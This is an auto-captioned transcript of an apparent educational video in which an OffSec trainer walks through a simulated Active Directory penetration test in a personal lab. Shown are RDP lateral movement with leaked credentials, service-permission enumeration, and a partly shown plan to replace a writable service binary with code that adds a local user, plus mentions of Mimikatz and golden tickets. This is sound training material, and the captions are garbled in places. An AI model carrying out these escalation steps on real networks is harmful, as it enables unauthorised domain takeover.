Windows Pentest Tutorial (Active Directory Game Over!)

Captions
This is going a little bit quick now, but it's just game over for this domain, so I mean we can play around for ages here. It takes a little bit of time because it needs to create the profile here in Windows, but we have a welcome screen and hopefully we will see a desktop pretty soon as well. With this we also, I mean obviously, we have escalated our privileges on clients and everything, right? You can go ahead now and start cmd. We don't even need to start this as admin because we are essentially domain admin here: net user Michael /domain, part of the Domain Admins. Yeah.

So today we're actually gonna do pretty much a full-scale simulated penetration test. I'm gonna go to the desktop and my pentest folder, which I have some files in. We have the CherryTree documentation here, we have something called Mimikatz (we're going to have a look at that a little bit later), we have some enumeration scripts, PsExec for possible lateral movement later, and PsLoggedOn. So this is kind of some of the tools I like to carry around when I do a pentest. So we're going to start Mimikatz, and this is how it looks. Looks awesome, right? No graphical stuff or anything, it's just text. So we just run whoami /groups there on the domain controller with our golden ticket injected, and we are now Built-in Administrators. We have a lot of other things as well, but we are also Domain Admins as Michael, we are Group Policy Creator Owners, we are Schema Admins and Enterprise Admins, and this Denied RODC Password Replication Group, right? High Mandatory Level. We have access to everything.

Just for everyone watching: this is a simulated environment, it's a lab, it's not a real environment. Never hack networks that you don't own or have permission to attack. So Remy, that's what we're doing here, right? It's just a lab that you guys have created? Correct, this is a lab that I created myself, so it's running locally, so whenever I need permission to attack something I just ask myself: hey, can I attack this? And yeah, sure we can. So we have no limitations here today, which is always fun, right?

Hey everyone, it's David Bombal back with a very special guest, Remy. Welcome! Thank you, thank you. So Remy, you've got to tell us a bit about yourself. I'm really excited about this video. Who are you, firstly, and what are we going to be covering? I'm really looking forward to this. So my name is Remy, I've been working in OffSec for, well, I don't know, seven years almost. I started back in 2016. My background before OffSec was mainly sysadmin; I've been working in help desk, I've been doing a lot of stuff with technology, right? My whole life has been technology essentially. So when I started in OffSec I started as a student administrator; I worked as that for about two years, so I was helping a lot of students with mostly the PEN-200 course. I believe it was called Penetration Testing with Kali, or PWK, back then, right? I had a lot of fun with that and went into some lead positions, some technical management, etc., and then eventually COVID hit, right? So we couldn't do live trainings anymore. OffSec has been doing live trainings for a long time, and we created this virtual program that allowed us to do live trainings online, right? So I was a part of that and did demos and had a lot of fun with students, and I also did some live trainings in real person on the PEN-200 course. A lot of fun as well, meeting some students live. That's cool, and not only being on the camera, that's great. Yeah, it's nice. Yeah, and now I work as a content developer in OffSec and I've been a part of the PEN-200 2023 upgrade that we released a couple of months ago, and I also have experience in pentesting, right? I got my hands a little bit dirty somewhere last year, doing some engagements here and there and trying to learn some new things that we can incorporate into our courses, right?

So for everyone who's watching,
there's a lot of content covered in this video, so I've put timestamps below as always. Use the timestamps if you're only interested in certain parts. Remy's doing an amazing demo, but there are also theoretical parts to the video where you explain certain things, because if you don't have that understanding it's difficult to follow along. But just use the timestamps to jump. So what I'm really excited about is we're talking about hacking Windows, right? And this is similar content to what's in the course, right? Yeah, so today we're actually going to do pretty much a full-scale simulated penetration test. It's based on the PEN-200 content; it's not the exact same attack vectors or anything like that, but it's on the same level, right? We're gonna focus mainly on Windows and especially Active Directory, because we're gonna pentest a domain, right? So we're gonna get a little bit of everything: we're going to do some enumeration, file transfers, we're going to do some Windows privilege escalation, for example, which is kind of a tricky concept for some of our students, right? And we're going to mainly focus on Active Directory and we're going to do some devastating attacks to the organization, and we are simulating here, so that's going to be fun. Offline you were talking about a golden ticket or something, and that sounds like it's going to be a lot of fun. Yeah, so we're going to do a golden ticket here and we're gonna do it as nasty as possible. That is just nasty. Essentially we're gonna gain some persistence in this domain that we're pentesting, hopefully, if everything goes right, and yeah, hopefully it's going to be devastating. And I'm glad this is a simulated pentest and not a real one, right? Because that would be not too good.

So I've got some great news as well: OffSec have given me a discount. Remy, what kind of discount are we giving people? Is it for the PEN-200 course? It's actually for a product we call Learn One. Okay. So it's potentially for a lot of courses, right? So Learn One is essentially a product you can buy which will give you a whole year of access to a specific course of your choosing. It's very flexible to a learner, not really any time crunch there; I mean you have a year to do the course, and it's also going to give you access to prerequisites, such as, if you want to do the PEN-200 course, you're also going to get access to the PEN-100 material, right? So you don't necessarily need to know pentesting whatsoever to get into this, and it's also two exam attempts there. We do want our learners to be certified, and we are continuously adding content, so you will get access to most of that as well. So yeah, so it's a 10% discount, right? Yeah, it's a 10% discount. Yeah, so for everyone watching, use the link below if you want to get 10% off. Big thanks to OffSec for sharing that. I don't get any affiliate fees, I don't get any money, so just a disclaimer: this is just to hopefully help you, I get nothing in exchange for this video. But Remy, we've spoken enough, let's start with the demo. Absolutely.

All right, so we're going to start our simulated penetration test here right now, and as you can see I'm sharing my screen. We are logged into Kali Linux, which is the distro I like to use when I'm doing penetration tests. The demo today is gonna be a mix between technical and not so technical; I'm gonna try to explain in a detailed way what we're doing, but having a little bit of experience with Windows especially, and having a high-level overview of what Active Directory is, is going to be a plus for this one, because we're gonna do a pentest on a domain, right? Are you running that in VirtualBox or in VMware or something? You said it's running locally, right? Yeah, so this is running locally on my computer. Currently I'm using Hyper-V in Windows, so the whole environment we're going to pentest today is actually running in Hyper-V, so it's a virtual machine. Yeah, so that gives me the ability to really mess my Kali up and just revert it, right? That happens exactly a little bit too often. So yeah. But what I think is nice though is, I mean, what you're demonstrating is this whole infrastructure running on, is it on a laptop? And people can replicate it. Yeah, this is on a pretty, you know, fully specced laptop. We're gonna see how many machines we are running when we go into the enumeration; currently I think it's running like seven machines plus the host itself, so it's taking up a lot of resources, but yeah, it works pretty well. And you don't necessarily need six machines or anything like that to build this yourself either. To get started with Active Directory especially, you need a server and a client: you need a domain controller and just a normal client, and off you go, right? How much memory have you got on that laptop? 32 gigs I believe, if it's not 64; I don't even remember now. Based on how well it runs now, I actually think it's 64.
Yeah, so you need a decent amount of RAM, but it's amazing what you can do. But again, I keep distracting you, go for it man. As I mentioned before, we are running a lot of VMs; you don't necessarily need to run that many VMs to get into this, right? Yeah, but we wanted to set up a cool scenario, and I think we did, right? So we're gonna dive into the demo, and today we are not really gonna focus too much on the enumeration perspective of the penetration test, because that can eventually get a little bit dull to watch. We're going to focus mostly on attacks. Yeah, the attacks are always funny, right? Enumeration is where you just discover what's out there, is that right? Yeah, correct. Actually I have to say that my favorite part when it comes to penetration testing is in fact information gathering, believe it or not. I really enjoy it because you kind of get to be this detective, right? Okay, I need to pull all of this together and we can do certain stuff with it. But of course attacks, you know, that's really the cool part, right? So today we're going to focus on Active Directory, as I mentioned before. We're gonna find out what to do when we have some credentials. The goal for the penetration test today is going to be to obtain domain admin in this domain I have running locally here. We are going to take somewhat of a targeted approach here, because if we're going to do all the enumeration, everything you do in a normal pentest, we will probably be sitting here for a week or, you know, two weeks, right? A pentest might even last for months, so we need to condense this a little bit. So it's gonna feel a little bit more targeted, but it's still going to be the same attack vectors as you can find in the real world, right?

I have some really simple documentation written up here. This is just done in CherryTree in Kali; I wrote it up for this demonstration. And we're going to do a penetration test, a simulated one, I just want to highlight that again, on a corp.com domain. This is the same domain name you will see in the PEN-200 labs if you take the PEN-200 course, but it's not the same domain, right? This is running locally on my end, and I have been engineering some cool attack vectors that we're going to use specifically for this demonstration. We're going to start in something that we call an assumed breach, and an assumed breach can be a lot of things, right? In many penetration tests, when you start, you go to the client and the client may give you a laptop and possibly a username and a password as well that allows you to log into their system, and they will hire you to do this internal penetration test, right? And this is known as a grey-box penetration test: they give you some sort of access. Obviously they don't give you the password for the domain admin or anything like that; that's up to you to find as a pentester. But that's really an assumed breach. Now in the demo we're going to do today, we actually take this a little bit of a step further, and I would say that we are towards the latter parts of the penetration test today. So in this assumed breach we can say that we have compromised a user in the corp.com domain with the username Michael. As you can see on my screen here, we have his password as well, so we can log into the domain with this user. And just for the sake of the story we can say that the attack vector we used was terrible social engineering, right? We tricked Michael here into giving us his username and password, or maybe we found it on some paper he wrote it down on. It could literally be everything, right? But the main part here is that it's an assumed breach, but this is not a powerful user, right? It's just like a normal user; this user is pretty standard. Yeah, it has no admin privileges anywhere in the domain. And CherryTree is just like some kind of logging software, or what is it? Yeah, so this is kind of a... you can use it for documentation. The reason I use it in Kali now is because it's installed by default, but I like to keep my notes there. I also use tools such as Obsidian, for example, or OneNote. I have also been kind of a sucker for Notepad, which can become a little bit tricky from time to time; you just dump everything you find into Notepad, right? And, you know, eventually, especially when you pentest a large organization, you're gonna get a lot of information as well, right? So you want to find a tool that works for you. But I like to be able to, like in here for example, I've added notes, so we have computers, users and groups and sessions and that kind of stuff.

So in this case I'm just gonna go through what I personally like to start with when I'm in an engagement where I'm gonna enumerate a domain, right? I'm not saying this is the correct way, I'm not saying this is what you have to do whatsoever; you can do what you want as a pentester. It's important to find a methodology that works for you, right? There is no right or wrong answer here. In this case we have enumerated the machines in the domain, and we can see we have a total of six machines, so the domain is not huge. The first machine here is a domain controller, absolutely the central piece of the domain, that is very important. We have a file server, a web server, we have a management server, and we have two clients. In the middle I have resolved the IP addresses from their hostnames, in case we want to do some scanning with Nmap for example from Kali. In case we are not able to resolve DNS here, then we can target them with a direct IP address. Maybe we will have to do that eventually, I don't know, we'll see. And we also have four Windows Server 2022 machines there, so four servers, two clients, and the clients are running Windows 11.
I'm glad to see you using like the latest version of software, not some old thing. Yeah, so when you enumerate computers in the domain you might actually end up finding really, really old artifacts that were created or built when the dinosaurs were still walking the Earth, right? They might still be logged into the domain, and obviously if you find such an artifact, that kind of shapes up to be a possible attack vector, right? Looking at this, I don't necessarily see any interesting attack vectors just yet, because this is all updated; those machines actually have the latest patches and everything, so we are probably looking for possible misconfigurations in this domain, right? That's the computers. We can go to users and groups as well. As I mentioned, it's a very small domain. We have the users here, a total of, I think, seven. Three of those are default, the three you see on top here. We have the built-in Administrator for the domain, the most powerful account, and if we are able to get access to this one during our pentest we can do, you know, really cool stuff. Not very realistic maybe to get access to this particular account, but, you know, who knows; I've seen many weird things out there doing penetration tests. So we have a Guest account; we don't necessarily care about that one for now. But we have an interesting one here: this is also a default account, krbtgt, and this is a very, very important account in the domain that is used during the Kerberos authentication process. It's used to sign TGT tickets. I'm talking a little bit more technical here now, right? But the krbtgt account is very important for the authentication mechanism, and we're going to have a look more specifically at what this account is doing eventually. Whatever you do as a sysadmin, make sure that no attackers get access to this account, because at that point it's just game over, like literally it's game over. So we're hopefully gonna see that game over eventually today, right? Okay.

So we also have four non-default users in the domain here: we have Michael, Mary, Emma and Jeff. Yeah, we have access to Michael; this is our starting point today, and we'll see if we can get access to the rest as well at some point, right? A little bit further down here I did some really light group enumeration, and those are by far not all the groups in AD, by the way; this is just a really partial view, but I found them a little bit interesting, right? The reason here is Enterprise Admins is the most powerful group in Active Directory, and we can see that the Administrator account is a member, and this is default. I'm gonna get to why this group is such a powerful one in a couple of seconds here, right? Looking at Domain Admins we see something interesting: Jeff. My man Jeff is a member there. So just by looking at this, our goal is to get domain admin in the domain; Jeff is a member of the Domain Admins group, so if we at some point are able to get access to Jeff, we would essentially be domain admin. If we can impersonate him or log in as Jeff, that would literally just be kind of game over for the domain and the end of our engagement, right? The reason I said that Enterprise Admins is more powerful is that in a domain, right, or in Active Directory, you might have one domain or you might have several domains, right? So in this case, corp.com, we can refer to corp.com as kind of the root domain, right? And in this case it's really the only domain; we don't have any other domains here, so we don't necessarily care too much about whether we get access to this group or the Domain Admins group. But if you have more domains, let's say for example you have a subdomain called sales.corp.com and you have another subdomain called development.corp.com, for example, right? So you have three domains: you have the root domain and the two subdomains. Then the Enterprise Admin will have full access to all the domains, including the subdomains, right? So that's really powerful. If you get access to, let's say for example, domain admin in sales.corp.com, that does not necessarily mean that you are a domain admin in development.corp.com as well, or the root domain. So there is a Domain Admins for each domain, but there is one Enterprise Admins for the whole forest essentially, which gives you access to everything. In the PWK course, do you teach a bit of the theory of this stuff? Yeah, okay, we do, correct. We are mostly focusing on the Domain Admins there, because we don't want to overcomplicate too much here; I just wanted to explain the difference here right now, right? But the goal in PWK is mostly to get domain admin, but you essentially follow kind of the same methodology if you target Enterprise Admins, for example, right? It's gonna be the same thing, but if you are in a multi-domain, you know, forest, you need to keep this in mind. And we discussed already: you've done the hard work of discovering all of this stuff before this video, basically, and now you're just going to show how to leverage that information. Yeah, so I'm going through this just to give some context to the attacks we're gonna do, right? Because otherwise the attacks are just gonna be, okay, how did Remy do this, why is it so... So just a little bit of context. No, it's great; I mean I think people would have the question, how did you find this stuff? But we'll cover that in perhaps a different video. Yeah, I mean essentially you have a lot of different tools you can use to enumerate AD, but yeah, we can discuss that a little bit later. I'm just presenting the information for now. So we have also two non-standard groups here, right? We have something called local ADM FS, which sounds really interesting, and Mary is actually a member of that group, right? If we look at the naming convention there, local ADM most likely has something to do with local admin privileges, right? And looking at the suffix there, FS, this corresponds pretty well with a file server that we have in the
domain. So we can do an educated guess now and say that, okay, if we are able to impersonate Mary at some point we might have local admin access to the file server in the domain. There are many ways, or more enumeration we could do, where we could look at the description for the group, for example; we could enumerate something called group policies, but those are out of scope for PEN-200, so I didn't want to add more, you know, confusing stuff in there right now. So Remy, a question that people may have is: what's the difference between a local administrator, or local admin, versus a domain admin? So a local admin is an admin on that given machine only, right? So for example, we can go back to our computers here. A domain admin would essentially be also an administrator on all those machines, yeah, right? Yeah, so you can log in here with your domain admin account. I really, really don't recommend doing that, by the way; never do that, just don't. It's like logging in as root, and administrator, yeah. We're going to see more why that's a bad idea later, right? But essentially a domain admin has access to pretty much everything in the domain, but the local admin may have access to, like for example, CLIENT01 here. If I add the user Mary to the local Administrators group on this particular machine, only on CLIENT01, then Mary's only going to be a local admin on that particular machine; she's not going to be a local admin on management or WEB02 there, right? We're actually going to see a little bit clearer difference between a domain login and a local login when we start the attacks today, so hopefully that's going to make a lot more sense then. The last group here, RDP web, Michael is a member there, and taking an educated guess here we can probably say that Michael should be able to log in via RDP to the web server, right? And again, we can do more enumeration on this, but the Michael user seems to be rather interesting after all, right?

Lastly in the enumeration we have a tiny bit here: we ran PsLoggedOn on the servers and we found on WEB02 here, which is a domain server, that CORP\Mary is actually logged in. Based on our enumeration, Mary should be a local administrator on the file server too, right? Enumerating computers, users and groups, and sessions usually is an eye-opener for what you can potentially do, right? And I wrote up this, highly theoretical by the way, we need to prove if this is going to work or not, I have an attack path here. So the goal now is to start with Michael. We're gonna try to RDP into WEB02 as Michael. If we are successful in doing that, that would actually count as a lateral movement attack in the domain. It doesn't have to be some super fancy, you know, PsExec or, you know, Evil-WinRM or that kind of stuff to do lateral movement. If RDP is open and you can use it, boom, lateral movement, right? Lateral movement is just where you're moving from one machine to another, right? Essentially, yeah: you obtain credentials and you just move around like a madman where you can, right? You want to get access to as much as possible essentially. So my plan here: if we are admin, we don't know that yet, right? If Michael is an admin on WEB02, we're gonna try to steal the credentials from Mary, who is logged in on WEB02, right? If we are not local admin, we will have to escalate our privileges. After escalating the privileges we can try to steal Mary's credentials again, because in order to steal those credentials we need a local... well, it doesn't necessarily need to be a local admin; we need to be an administrator or we need to be SYSTEM on the machine, because we need to tap into a specific process in order to steal those credentials, right? So we may have to do some escalation here. With Mary, if, you know, the stars align and everything is fine, we should be able to access the file server as local administrator, and then who knows what happens, right? We cannot possibly tell right now, and I wish I could see into the future, but I can't, so I don't know if any of this is gonna work. But this is a highly theoretical attack path now, and something I kind of cooked up in my head just based on the information we have gathered. But I love that you've given us sort of, like, you've logged the details of what you've discovered and then you've come up with an attack path, which is great. Yeah, yeah. That's great.

Yeah, so that's it for the enumeration part for now, right? We just went through, you know, some documentation, and now it's time to finally do some hacking, right? So I'm gonna minimize my CherryTree here now and I'm gonna open a terminal in Kali, and I have some long commands today which I have documented. So for everyone watching, I put the commands below, a GitHub link where you can just copy the commands, so don't worry about trying to copy them while you're watching the video. So Remy, thanks so much for sharing the commands; that'll obviously make the video quicker, so again, use the link below. Sorry Remy to interrupt, carry on. No problem at all, no problem. I also need to do some explanation here on what we're actually doing in order to connect to this machine, right? So we're using a built-in tool, an RDP client called xfreerdp in this case, which is installed in Kali. You don't necessarily need to use this, you can use your own personal preference, like, you know, rdesktop; there are so many clients out there, but you should be able to connect with most of them, right? So what's more important here is that we are using the username Michael, which, you know, we found this password and username, right? So the username is Michael, the password is "my lead password", a very, very nice password, right? Yeah, so Michael is probably very leet, and this is his downfall. Yeah, yeah, we're gonna prove him wrong, right? Yeah, so the main important part here is the /d:corp.com, and this kind of goes a little bit
back to where we talked about local admin versus domain admin and that kind of stuff, because Michael probably does not have a local user account on the machine we're connecting to. This is the IP for WEB02, by the way. So if we don't specify the domain here, Michael will not be able to log in; we need to specify the domain name. The rest there, this is just me doing some fonts and resizing to make this look good, so this is not necessarily something you need to, you know, connect via RDP to a machine. Those parts are the most important ones, and we're going to use those many times today. So let me go ahead and hit enter here, and hopefully we will be authenticated somewhere. And it seems that we are. All right, so we're logged into this Windows machine, right? And I don't necessarily like graphical user interfaces too much, so I'm going to go ahead and just start command prompt here as a true hacker, right? I was going to say, what is this, what's a GUI, come on. Yeah, well, what is it, like, who knows, right? We are in command prompt now and we can start looking at some commands, right? We can type hostname, for example; this shows that we are indeed logged in on the machine WEB02.

So we are logged in on WEB02 here, and who are we? whoami, right? Simple commands. We are Michael, so we can see that here. What's important to note is that we have this prefix here called CORP; this tells us that we are connected to the corp.com domain, we are not logged in locally on the WEB02 machine. If it said WEB02 here, we would be a local account on the machine, but we're not, we are in the domain, right? And so this is the lateral movement thing where you were able to jump from one machine to another and log in with this user which, you know, someone phished these details, or we found it online or something, right? Yeah, so once I actually did RDP here, that would count as a lateral movement technique in Active Directory, because we are not connecting to the laptop we were given by the client anymore; we are connecting somewhere else with some credentials we found. And any time you move from one machine to the other, it kind of counts as lateral movement. And for all the haters that might say, well, this is dumb because it's too easy: this is the stuff that happens, right? People's credentials are leaked; this has happened. Yeah, this happens, trust me. And I'm gonna have to agree that this was a really simple attack right now, but we are going to get more complex down the line, right? So we start light and we end... I'm not gonna say nightmare, but it's going to be a little bit more tricky; we're not just gonna RDP. It's like what Jeremy said in the last interview, it just gets better and better, right? So yeah, that's the goal here, right? Okay, so yeah, as a recap, we are logged in on WEB02 as Michael. I'm doing a lot of cls, by the way, just to clear my screen, like this. And just to show the user accounts on the local machine, if I do net user, for example, we can see that there is no Michael user here, and this further illustrates that we are not logged in with a local account. This Administrator account is the local administrator for the WEB02 machine; this is not the same Administrator account as the domain admin, right? There are many, many administrators in this network, and who knows, maybe this one is interesting for us; I mean, I don't know, we'll have to see, right? I know that there can be a little bit of confusion about, okay, am I local or am I in a domain, right? The best way to figure it out: whoami, and you will see the domain here. If you see the hostname for the machine, you are logged in locally. So clearing the screen again, and our goal now, if we go back to the CherryTree documentation and look at the attack path, we have RDP into WEB02. If we are admin, we're going to try to steal Mary's credentials, because she is also logged in on this machine, right? If not, we will have to escalate. So far at this point our theory proves true, right? We were able to RDP; that's good. And let's see what we can do more here now. I'm gonna do whoami /groups here. So I typed whoami /groups in the command prompt, because I want to learn a little bit more about this Michael user, right? And this will give me an overview over local groups on the machine that I'm a member of, and also the domain groups. So in this case we see that we are a part of Everyone; that makes sense, right, because we are a user actually on the machine now. We are a part of the Built-in Users, we are Remote Desktop Users. The ones you see here are pretty standard, right? Nothing really special about those permissions, and we can see that on the right side there as well: well-known group, right? We also have CORP\RDP web; we already knew that this is an AD group. In this case we actually see the security identifier for the domain itself and the relative ID for this group, which is 1607.
Now this may not make a lot of sense right now, but this security identifier is going to play a crucial role eventually, when we're going to be a little bit more devastating to the organization, right? But looking at this, we do not have any reference to administrator or anything, so it really seems like we are not the local admin on this machine based on this, because then it would probably say Built-in Administrators here, right? We can potentially try to start command prompt as administrator, but we are getting a UAC prompt here which asks us for credentials, and if we were logged in with a local admin here, we would essentially just have to click yes or no on this prompt. In this case we need to enter credentials, and this tells me, okay, very likely we are not a local admin on the machine. Looking back at our attack path, we wanted to steal Mary's hash, right? That's kind of our goal here, but we cannot do that unless we are local admin on the machine. In this case we need to do something called privilege escalation, and that's essentially you go from one user and you elevate your privileges on the machine, right? And that can often be a little bit tricky, both for Linux and Windows; it's not necessarily my favorite field of expertise either, but as a pentester you just simply have to do it from time to time, that's just the way it is. Often in a pentest as well, when they hand you this laptop, you're most likely a low-privileged user there, and one of the goals from the client might be to escalate the privileges: can you escalate on our laptops? We need to look into some ways to escalate our privileges here, and for the last couple of years there's been more automation when it comes to this kind of stuff, right? Back in the day when I started as a hacker, we essentially had to write our own scripts to enumerate this and that, like, okay, I want to enumerate all the users, I want to enumerate services, and you kind of type a script to do that for you and output, you know, the details, right? Nowadays we have tools such as winPEAS, for example. It's a really, really great tool that will essentially go through the machine, check for permissions on different folders, check for anomalies, right, in Windows, and point you towards, okay, hey, this might be something worth checking a little bit closer. You get that from GitHub or somewhere? Yeah, you can find it on GitHub. You also can find pre-built executables for it, so winPEAS.exe. Be careful though, you want to make sure that you're downloading the correct file. Exactly, just be careful in general when you're working in this kind of field; never trust anyone, right? So but yeah, winPEAS is a great tool; it's going to iterate through everything on the machine for you and kind of point out the anomalies. I'm more of the manual guy when it comes to this kind of stuff, and while I like automated tools, I also like to know how to do stuff myself, right? I don't want to put all my trust in this: okay, I'm gonna run this tool and hope that it's gonna give me something, and if it doesn't, I'm gonna just deem that, okay, this system is secure, right? I just don't want to go down that path. As I mentioned in the beginning here, we are doing a simulated test, and I'm not going to enumerate the entire Windows system right now, because that's just going to take too much time. But if you are like me, you like to do things manually, you might browse through the file system, look at, okay, how many users have a profile here, what kind of applications are installed, right? If there is a vulnerable service, for example, you might be able to find an exploit for it, and just boom, you can exploit it and possibly elevate your privileges at the same time. So in this case we're gonna do this manually, and this is going to be somewhat targeted, right? I'm gonna start PowerShell on the WEB02 machine and I'm going to run a rather long command here. In this case we are running something called Get-CimInstance, and CIM stands for Common Information Model. For enumeration purposes I would really compare this to WMI, which is the Windows Management Instrumentation, but CIM is going to provide you with cross-platform capability, and it also has some enhanced remote capabilities for system admins and that kind of stuff, right? So it's kind of the new hot thing to use. We don't necessarily need to use it, but I'm trying to stay at least a little bit up to date on the new tools we are using, right? So in this case we are going to use Get-CimInstance on Win32_Service, which is a WMI class that provides information about services on the machine. We're going to ask for the name, so we pipe this into Select, right? We're going to select the name; we want to see the state of the service, whether it's running or disabled and that kind of stuff; the path name, which is the path to the executable for the service, i.e. what executable is being executed when the service starts, right; and the start name, who actually starts the service, because this plays a vital role if we want to escalate our privileges. In this case we pipe all of this into Where-Object, where State is going to be like Running, because first we're gonna enumerate the running services. And yes, we should probably know, right, disabled services, stopped services and that kind of stuff as well, because we might be able to use those for something evil as well, but let's start with running. We need to start somewhere, right, David? So let's hit enter and be amazed at the output we receive here. This can be a little bit intimidating, especially if you're new to Windows privilege escalation, right? We have received a lot of information here, and by default there are a lot of services running in Windows as well, and many of those are default. Yeah, it's actually rather insane. Now I want to give an example right away on why exactly I'm doing this. Okay.
why is remember looking at the services what's his goal here right just as an example we can look at the the spooler service here right the name is spooler and we can see that the running executable for this one is spool sv.exe so when a spooler service starts it's gonna run this executable air right this is the path for the executable for for the service looking at the right side this one is being started as local system I'm not saying the spoiler service is vulnerable here right but if we are able to replace this exe file with some malicious code and that txe file is being executed by local system what's going to happen right we're actually going to have command execution as local system on the machine a local system is the highest privilege you can have you can have on a Windows machine right let's say if we are able to replace this one with for example a reverse shell that connects back to us in a listener we have in Cali we're going to get a system shell and we have full control over the box right so that's the goal there looking for for you know weak permissions essentially so looking at the output here we have a lot of services but we can see that many of those are pointing to C colon Windows system 32 here we have SVC host exe for example we have a lot of default Services here and we we don't necessarily want to try to replace SVC house exe right and we are essentially looking for anomalies here I like to stay away from whatever where I see see colon Windows system 32 and as I mentioned before we need to start somewhere so so let's look for some anomalies here right browsing up a little bit we actually have one here it's it can be a little bit tricky to see but we have a MySQL service running here called xampp well actually the service is called MySQL right but we can see the executable for it this is not the standard service in Windows xamp is something some C submin has installed on the machine at some point and this is kind of is sailing up to be one of 
those interesting ones right especially if you look on the right side here because this service is also running with local system so again if we are able to replace this exe file with a malicious code it's gonna execute this local system and we can do a whole lot of stuff right so this one is interesting going a little bit further up here on the top we can see Apache 2.4 is also running and we can see the path executable which is also exam so in this case it seems like the the system installed example the machine using it to to to serve some sort of web application with mice database on the back end right and this one is also running as local system now the goal for us we don't know if this is going to work yet by the way but the goal is essentially to replace this exe file but in order to do that we need to have the correct permissions right and we need to find out those permissions so I'm going to go ahead and copy this and I'm going to clear the screen and I'm going to use a user tool which is called I I'm not sure if I pronounced this correctly but I call it eye cackles this stands for integrity Access Control access list it's a very fancy word right for something that does something fairly simple it's installed in Windows by default and it can essentially be used to well the technical correct term would be to enumerate the access control list on a binary or a folder right we can use this to enumerate binaries and folders the permissions there and we're gonna point this to I copy the the folder earlier but I think I might remember it it's gone from my clipboard now but exam Apache been Apache or httpdexe was it right httpd like this so we can point this tool to this particular file and see the permissions so that was a good point for the previous tool was that is that also built into Windows or did you have to install something to run that no that's built that's built into Powershell the getsim instance is is a Powershell Command right so you haven't installed 
any malicious software yet it's just using the built-in tools at the moment yeah yeah we are leaving of the land as we like to call it yeah so running the tool here we are now specifying an HTTP deexe file and we can see the first occurrence of a user here right NT Authority system we can see an eye here this simply means that the permission that NTA Authority system has is being inherited from the parent folder here right so this is this is probably the same permission of being Apache example and the C drive itself because the entity Authority system is the most privileged account and we can see the affair that means full access and it's the same for administrators no surprise really because an admin would be able to to do modifications on this file but if we were a system or admin we wouldn't even be in this situation right because we didn't we wouldn't necessarily have to escalate our privileges we would be able to to achieve our goals but we are just essentially a built-in user here and the built-in users they also inherit the permissions from the parent folder but in this case we have no full access we have R which means read permissions and X means executable permissions right so we are not able to replace the cxe file with the permissions we have here we can launch the file but what what is that going to do right yeah start the web server I mean it doesn't really it won't help us so we need to look a little bit further I'm going to run the same on the SQL xampp let's see MySQL bin MySQL D file as well like this and here we kind of see something really interesting right away the built-in users which we are a part of has this F right so we have full access there it's actually listed twice here because the C submin did something really strange here trying your dumb dumb and also a little bit strange I will have to to arrest myself here because I set this up right of course but we can blame Jeff the domain admin my name is yeah in in the in the system here so we 
have two occurrences here we have two built-in users they both have the F so that they have full access the I on this one means that it's inheriting permissions from the parent folders right this one just means that we have full access to this particular file so this tells me that the suicide bin has actually logged into this machine first given full access to well I don't know what's first right but they might have given full access to the MySQL the exe file to the built-in users and then afterwards given full access to the whole structure right I mean I don't know but there are two things going on there and of course we have the NT Authority system and the administrators that they still have full access right and to further further like set this a little bit in stone we can do the who are my groups again right and looking at this as a whole now we we are running here mys Michael we are a part of the built-in users and looking here we have full access to this MySQL deexe file and we can actually replace the file if we want to it's crazy that you as a standard user can get all this information right it is it's actually a little bit scary about the normal users can get also with ad enumeration there are so many things you can you can query the domain controller for Via ldap as long as you're just connected to the domain it's uh it's kind of mind-blowing in this case I mean I'm I'm I've said many times now we're going to replace this file but in an engagement even though this webo 2 server is within the scope I don't think it would be a good idea to just go ahead and replace the MySQL file right because the service is eventually gonna crash if we try to restart this service and it's going to start with a malicious exe file then MySQL server is not going to be available anymore right this might be a critical a piece of component or or a critical component rather for the organization right if they lose access to their database you know we make awesome Mayhem before you 
do this in a penetration test if you're a serious penetration tester you will contact the client you will lay down this scenario okay this is what we can do what we can see here is that actually prove enough that we are able to to replace this file and we don't necessarily have to go ahead and do the attack itself in order to progress through the pen test a little bit we might have to do that but instead of bringing the whole system down maybe you can work with a client and they can give you the admin access instead of you giving yourself the admin access on a web or 2 server Yourself by breaking it right because this is a proof that we can actually conduct this attack I mean that whole point is it's a penetration test you're not hacking you're trying to trying to help the client yeah yeah exactly and you're not really helping the client if you jump on the for on the first vulnerability you find and you just crash the whole system not really yeah that's not the goal right but as I said I'm the creator of this lab and I talk to myself earlier here is it okay if I if I mess it up a little bit hell yeah right so you got snapshots so you're good I have snapshots so I can always just revert back so already saving Remy permission to hack Remy yeah no problem right so we're going to do this attack I'm going to go ahead and clear the screen now because this is a little bit messy I'm also going to minimize the RDP window because we're going to go back to Cali now I'm going to open a new terminal and let's call the previous terminal web O2 RDP right just to keep it a little bit clean here and I'm going to go to the desktop and my pen test folder which I have some files in we have the cherry tree documentation here we have something called mimikats we're going to have a look at that a little bit later we have some enumeration script PS exec for possible lateral movement later and the PS logged on right so this is kind of some of the tools I like to carry around when I do a 
pen test and I've added it to the pen test folder now because we may have to download them from the from the cal machine later right so I'm gonna create a c code here and hopefully create an executable that we can use in in Windows right now a lot of your viewers now David is probably gonna arrest me but I'm gonna use Nano for this that's okay uh I don't want to spend 30 minutes trying to understand how to enter text into VI right so yeah you're gonna start a war I'm gonna start the war now but yeah so so I arrest me if you want right I I just I do I'm just not capable of using VI I need to use the Nano here so for everyone watching Remy's in the states right yeah right I mean it's a normal country yeah for sure so I'm gonna create a file here called aduser.c which is just gonna be a C file essentially I'm gonna do a copy and paste you now with the source code because I don't want to type this out on the Fly here so essentially this is uh as simple as it gets right we are including a standard Library here we have a main function right we are declaring an integer uh named I and the variable is used to store the return value of system here right so this is you you don't need to know a lot of C to to understand this you you don't necessarily even need to know C at all you can copy this right we're essentially asking the system air to Run net user this is like if we are on a Windows system it's a window system as admin we could type this out in a command prompt right so net user Mighty this is gonna be the username might is my my handle on Discord by the way if you wanna if you want to say hello there and the password in this case we have a super weak password in a penetration test if you're allowed to do this attack pick a stronger password right be a responsible penetration tester and we have the slash ad there so this command is hopefully when it's being run a system as we think it will be it's going to add the user to the to the local local box web or two with this 
